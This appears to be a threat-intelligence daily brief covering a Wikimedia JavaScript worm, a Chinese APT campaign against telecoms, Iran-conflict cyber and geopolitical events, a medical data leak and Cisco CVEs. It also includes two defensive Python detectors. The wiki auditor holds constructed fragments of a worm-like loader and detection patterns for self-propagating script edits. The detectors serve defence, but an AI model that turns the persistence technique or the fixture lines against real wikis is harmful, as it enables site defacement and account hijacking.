
ZeroFox Daily Intelligence Brief - March 6, 2026

by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

  • JavaScript Worm Modifies Thousands of Pages Across Meta-Wiki
  • China-Linked UAT-9244 Targets South American Telcos
  • Iran SITREP: Iranian APTs Allegedly Breach U.S. Networks, Hezbollah Warns Israeli Residents

JavaScript Worm Modifies Thousands of Pages Across Meta-Wiki

Source: https://au.pcmag.com/security/116384/wikipedia-forced-to-lock-down-edits-over-javascript-that-could-vandalize-pages

What we know: A malicious JavaScript worm briefly spread across Wikimedia Foundation infrastructure, primarily Meta-Wiki, and has since been contained. Close to 4,000 pages were modified and 85 user accounts had their common[.]js scripts replaced by the worm. The worm was accidentally triggered when a dormant script was activated during a security review.

Context: The worm was a self-propagating JavaScript script that spread through the scripting features of MediaWiki, which powers Wikipedia and other Wikimedia projects. It attempted persistence in two ways: replacing a user’s common[.]js file (so the script would reload whenever the user logged in) and modifying the global MediaWiki:Common[.]js script (so the worm would execute for the many editors loading the site).

Analyst note: Before containment, the worm likely self-propagated across multiple accounts and pages, modifying user scripts and injecting malicious loaders into shared scripts used by editors on Meta-Wiki.
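The two persistence paths described above (a user's common.js and the shared MediaWiki:Common.js) are ordinary wiki pages, so a defender can review their text. The following is an added example, not code from Wikimedia or ZeroFox: a small audit that flags script pages loading code from hosts outside an allow-list, evaluating code at runtime, or editing other .js pages through the API. The rules are heuristics of my own, the allow-list and the three sample pages are constructed, and the suspicious fixtures are deliberately non-functional fragments that only exist to trip each rule.

```python
import re
from urllib.parse import urlparse

# Hosts this wiki's scripts are expected to load code from.
# Constructed allow-list for the example; adjust for the wiki being audited.
ALLOWED_HOSTS = {"meta.wikimedia.org", "en.wikipedia.org"}

# Calls that pull script from a URL; the URL is captured for the allow-list check.
# Also catches `x.src = "..."`, so an <img>.src assignment to an unlisted host
# is a false positive worth tolerating in a review queue.
URL_LOADER_RE = re.compile(
    r"""(?:mw\.loader\.load|importScriptURI|\$\.getScript|\.src\s*=)\s*\(?\s*['"]([^'"]+)['"]"""
)
# Runtime code evaluation: rarely needed in a legitimate gadget, common in obfuscated loaders.
DYNAMIC_CODE_RE = re.compile(r"\b(?:eval|Function)\s*\(")
# An API edit whose title ends in .js: a script that rewrites script pages is
# the persistence/propagation pattern that warrants a human look.
SCRIPT_PAGE_EDIT_RE = re.compile(
    r"""action\s*[:=]\s*['"]edit['"][\s\S]{0,200}?title\s*:\s*([^,}]*\.js['"])"""
)


def audit_script(text, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (rule, evidence) findings for one script page's text."""
    findings = []
    for m in URL_LOADER_RE.finditer(text):
        url = m.group(1)
        host = urlparse(url).hostname  # None for module names and relative paths
        if host and host.lower() not in allowed_hosts:
            findings.append(("external_loader", url))
    m = DYNAMIC_CODE_RE.search(text)
    if m:
        findings.append(("dynamic_code", m.group(0)))
    m = SCRIPT_PAGE_EDIT_RE.search(text)
    if m:
        findings.append(("writes_script_page", m.group(1).strip()))
    return findings


def audit_pages(pages, allowed_hosts=ALLOWED_HOSTS):
    """Audit a {title: text} mapping; return only the titles that have findings."""
    flagged = {}
    for title, text in pages.items():
        findings = audit_script(text, allowed_hosts)
        if findings:
            flagged[title] = findings
    return flagged


# Constructed sample pages (not real Meta-Wiki content).
BENIGN_SCRIPT = """\
/* constructed benign user script */
mw.loader.using(['mediawiki.api'], function () {
  importScript('User:Example/helper.js');
  mw.loader.load('https://en.wikipedia.org/w/index.php?title=User:Example/tool.js&action=raw&ctype=text/javascript');
});
"""

SUSPICIOUS_SCRIPT = """\
/* constructed fixture: trips each rule, not a working payload */
var s = document.createElement('script');
s.src = "https://cdn.untrusted.invalid/loader.js";
document.head.appendChild(s);
eval(payload);
new mw.Api().postWithEditToken({ action: 'edit', title: 'User:' + name + '/common.js', text: body });
"""

GLOBAL_SCRIPT = """\
/* constructed fixture: a shared script with an injected protocol-relative loader */
mw.loader.load('//static.untrusted.invalid/l.js');
"""

SAMPLE_PAGES = {
    "User:Alice/common.js": BENIGN_SCRIPT,
    "User:Mallory/common.js": SUSPICIOUS_SCRIPT,
    "MediaWiki:Common.js": GLOBAL_SCRIPT,
}

if __name__ == "__main__":
    for title, findings in audit_pages(SAMPLE_PAGES).items():
        print(title)
        for rule, evidence in findings:
            print(f"  {rule}: {evidence}")
```

In practice the page texts would come from the wiki's revision history rather than string literals, and the same rules can be run as a diff check on each new revision of a `.js` page so that an injected loader is flagged at edit time rather than during a later review.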

China-Linked UAT-9244 Targets South American Telcos

Source: https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/

What we know: A China-linked advanced persistent threat (APT) group, UAT-9244, has targeted telecommunications providers in South America since 2024, compromising popular operating systems and network-edge devices. The campaign used three malware families: TernDoor, a Windows backdoor; PeerTime, a Linux backdoor that uses BitTorrent; and BruteEntry, a brute-force scanner that builds operational relay boxes (ORBs).

Context: Edge devices that lack adequately enforced endpoint security controls are attractive targets for cyber attackers. In 2025, 14 enterprise technology zero-day vulnerabilities affected edge devices such as routers and switches. Most of these attacks appeared to be espionage-driven, with China-linked threat groups responsible for the majority of the activity.

Analyst note: Given that the malware strains in the group’s arsenal serve to establish backdoors and to build proxy infrastructure through ORBs, the group is likely attempting to build botnet-like infrastructure out of insecure routers, embedded systems, and telecom network devices to collect information.
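A brute-force scanner that builds ORBs out of edge devices leaves a recognisable trace in the devices' authentication logs: one source failing logins against several devices in a short span, sometimes followed by a success. As an added example (not ZeroFox or Cisco Talos tooling), the detector below parses sshd-style auth lines forwarded from edge devices to a syslog collector and flags sources by failure count, number of distinct devices touched, and success after repeated failures. The log format, host names, RFC 5737 addresses and thresholds are all constructed assumptions; adapt the regex to the device family you actually collect from.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd-style authentication lines as they might be forwarded from edge devices
# to a syslog collector (constructed example format).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

# Constructed sample: one scanning source, one legitimate operator typo,
# one low-volume source that stays under threshold.
SAMPLE_LOG = """\
Mar  6 01:12:01 rtr-edge-01 sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  6 01:12:03 rtr-edge-01 sshd[2101]: Failed password for admin from 203.0.113.7 port 40112 ssh2
Mar  6 01:12:09 rtr-edge-02 sshd[3310]: Failed password for invalid user ubnt from 203.0.113.7 port 40240 ssh2
Mar  6 01:12:10 rtr-edge-02 sshd[3310]: Failed password for admin from 203.0.113.7 port 40240 ssh2
Mar  6 01:12:14 rtr-edge-02 sshd[3311]: Connection closed by 203.0.113.7 port 40240
Mar  6 01:12:20 rtr-edge-03 sshd[1187]: Failed password for root from 203.0.113.7 port 40388 ssh2
Mar  6 01:12:22 rtr-edge-03 sshd[1187]: Failed password for admin from 203.0.113.7 port 40388 ssh2
Mar  6 01:12:31 rtr-edge-03 sshd[1190]: Accepted password for admin from 203.0.113.7 port 40402 ssh2
Mar  6 01:15:02 rtr-edge-01 sshd[2150]: Failed password for netops from 198.51.100.20 port 55010 ssh2
Mar  6 01:15:09 rtr-edge-01 sshd[2150]: Accepted password for netops from 198.51.100.20 port 55010 ssh2
Mar  6 01:20:45 rtr-edge-02 sshd[3390]: Failed password for admin from 192.0.2.9 port 60001 ssh2
Mar  6 01:20:50 rtr-edge-02 sshd[3390]: Failed password for admin from 192.0.2.9 port 60001 ssh2
"""


def parse(lines):
    """Yield one dict per matching auth line; non-auth lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        # Syslog timestamps carry no year; good enough for span calculation.
        ev["ts"] = datetime.strptime(" ".join(ev["ts"].split()), "%b %d %H:%M:%S")
        yield ev


def detect(events, fail_threshold=5, device_threshold=3):
    """Group auth events by source address and flag brute-force/scanner behaviour."""
    per_src = defaultdict(lambda: {"fails": 0, "devices": set(), "users": set(),
                                   "successes": [], "first": None, "last": None})
    for ev in events:
        st = per_src[ev["src"]]
        st["devices"].add(ev["host"])
        st["users"].add(ev["user"])
        st["first"] = ev["ts"] if st["first"] is None else min(st["first"], ev["ts"])
        st["last"] = ev["ts"] if st["last"] is None else max(st["last"], ev["ts"])
        if ev["result"] == "Failed":
            st["fails"] += 1
        else:
            st["successes"].append((ev["host"], ev["user"]))

    findings = []
    for src, st in per_src.items():
        reasons = []
        if st["fails"] >= fail_threshold:
            reasons.append("failed_logins")
        if len(st["devices"]) >= device_threshold:
            reasons.append("multi_device_scan")        # one source, many devices
        if st["successes"] and st["fails"] >= fail_threshold:
            reasons.append("success_after_bruteforce")  # likely compromised device
        if reasons:
            findings.append({
                "src": src, "reasons": reasons, "failures": st["fails"],
                "devices": sorted(st["devices"]), "users": sorted(st["users"]),
                "successes": st["successes"],
                "span_s": int((st["last"] - st["first"]).total_seconds()),
            })
    return findings


def run_sample():
    return detect(parse(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The `success_after_bruteforce` reason is the one to page on: it marks a device that has most likely just been enrolled as a relay, and the `(host, user)` pair tells the responder which account to rotate and which device to pull off the network for inspection.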

Iran SITREP: Iranian APTs Allegedly Breach U.S. Networks, Hezbollah Warns Israeli Residents

  • Iranian APT MuddyWater reportedly embedded itself within multiple U.S. companies' networks using a previously unknown backdoor since early February. Separately, manufacturing and transportation sectors are reportedly being primarily targeted by Iran-linked APTs, which ZeroFox assesses is likely to cause significant supply chain disruptions and long-lasting downstream effects.
  • Major economic indicators such as oil prices and global stock markets have only shifted moderately since declining on March 2, the first day of open trading. ZeroFox assesses that the data is consistent with the belief that the Iran conflict will be short in duration. However, if Iran maintains enough offensive firepower, economic optimism will prove misplaced, and there will almost certainly be dramatic economic declines.
  • Due to rising fuel costs, the Philippines is reportedly discussing a four-day work week as it imports nearly all of its oil. Additionally, the United States has offered India a 30-day waiver to purchase Russian oil as the conflict has stranded oil tankers near the Strait of Hormuz.
  • Iran reportedly attempted to bomb a U.S. military base in Qatar using two Su-25 bomber jets, which were shot down by Qatar. This marks the first reported deployment of fixed-wing aircraft in offensive operations by Iran and likely demonstrates Iran’s desire to find an attack strategy that can bypass interceptor systems.
  • Hezbollah has warned Israeli residents residing within 5 km (3.11 miles) of the border between the countries to evacuate. Meanwhile, an Iraqi militant group “Saraya Awliya al-Dam” has reportedly claimed to have struck a “vital” target in Jordan.
  • Europol has warned that the conflict in the Middle East could quickly affect security across the European Union (EU), increasing the likelihood of terrorism, serious organized crime, violent extremism, and cyber-related threats.
  • Etihad Airways has resumed limited flights from Abu Dhabi to several key destinations. The airline has also warned customers of fake accounts attempting to collect personal information.

DEEP AND DARK WEB INTELLIGENCE

BreachForums user NetRunnerPR: A threat actor named "NetRunnerPR" has claimed to have leaked data associated with Shiraume-kai Group, a Japan-based medical and social welfare organization, on deep and dark web forum BreachForums. The actor claims to have exfiltrated patients’ personally identifiable information (PII) and medical records. If legitimate, the dataset is likely to be used in phishing and social-engineering attacks or insurance fraud targeting exposed individuals.

VULNERABILITY AND EXPLOIT INTELLIGENCE

Cisco vulnerabilities: Cisco has released security patches for 48 new firewall vulnerabilities, including two critical ones, tracked as CVE-2026-20079 and CVE-2026-20131. Additionally, Cisco warned in an update to a February 2026 advisory that two Catalyst SD-WAN Manager security flaws (CVE-2026-20128 and CVE-2026-20122) are under active exploitation. The flaws are likely to be exploited individually or in chains by advanced threat actors to compromise corporate networks.

Affected products: The affected products are listed in this advisory.

Tags: DIB, tlp:green